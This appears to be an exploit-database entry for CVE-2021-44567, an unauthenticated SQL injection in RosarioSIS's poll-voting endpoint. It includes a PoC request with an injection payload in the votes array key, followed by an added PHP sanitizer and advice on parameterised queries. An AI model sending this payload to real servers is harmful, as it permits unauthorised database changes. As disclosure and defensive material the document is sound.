# Exploit Title: [RosarioSIS < 7.6.1 Unauthenticated SQL Injection via votes Parameter in PortalPollsNotes.fnc.php]
# Date: [2024-10-26]
# Exploit Author: [CodeSecLab]
# Vendor Homepage: [https://gitlab.com/francoisjacquet/rosariosis]
# Software Link: [https://gitlab.com/francoisjacquet/rosariosis]
# Version: [7.6]
# Tested on: [Ubuntu Windows]
# CVE : [CVE-2021-44567]

PoC:

POST /ProgramFunctions/PortalPollsNotes.fnc.php HTTP/1.1
X-Requested-With: XMLHttpRequest

Constraints and code flow:

isset( $_POST['votes'] )
&& is_array( $_POST['votes'] )
&& $_SERVER['HTTP_X_REQUESTED_WITH'] == 'XMLHttpRequest'
&& foreach ( (array) $_POST['votes'] as $poll_id => $votes_array )
&& if ( ! empty( $votes_array ) )
&& PortalPollsVote( $poll_id, $votes_array )

votes['; CREATE TABLE aaa(t text) --]=1
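
The PoC places its SQL in the array key of votes[], which the flow above hands to PortalPollsVote() as $poll_id. The following is an added example, not RosarioSIS code or the vendor's patch, showing one way to constrain that key before it reaches any query. sanitize_poll_votes() is a hypothetical helper, and it assumes that poll ids are positive integers and that vote values are non-negative integers.

```php
<?php
// Added example: hypothetical helper, not part of RosarioSIS.
// Assumption: poll ids are positive integers, vote values are
// non-negative integers. Anything else is dropped.

function sanitize_poll_votes( $raw_votes )
{
    $clean = [];

    if ( ! is_array( $raw_votes ) ) {
        return $clean;
    }

    foreach ( $raw_votes as $poll_id => $votes_array ) {
        // PHP turns purely numeric keys into int; every other key stays
        // a string, so compare on the string form.
        $poll_id_str = (string) $poll_id;

        if ( ! ctype_digit( $poll_id_str ) || (int) $poll_id_str < 1 ) {
            continue; // rejects keys such as "'; CREATE TABLE aaa(t text) --"
        }

        $options = [];

        foreach ( (array) $votes_array as $option ) {
            if ( is_scalar( $option ) && ctype_digit( (string) $option ) ) {
                $options[] = (int) $option;
            }
        }

        if ( $options ) {
            $clean[ (int) $poll_id_str ] = $options;
        }
    }

    return $clean;
}

// Constructed sample input with the same shape as the PoC body,
// plus one well-formed vote.
$sample_votes = [
    "'; CREATE TABLE aaa(t text) --" => '1',
    '12' => [ '0', '2' ],
];

// Only poll 12 survives, with integer options 0 and 2.
var_dump( sanitize_poll_votes( $sample_votes ) );
```

Key validation of this kind narrows the input; binding $poll_id as a query parameter instead of concatenating it into SQL is what removes the injection class.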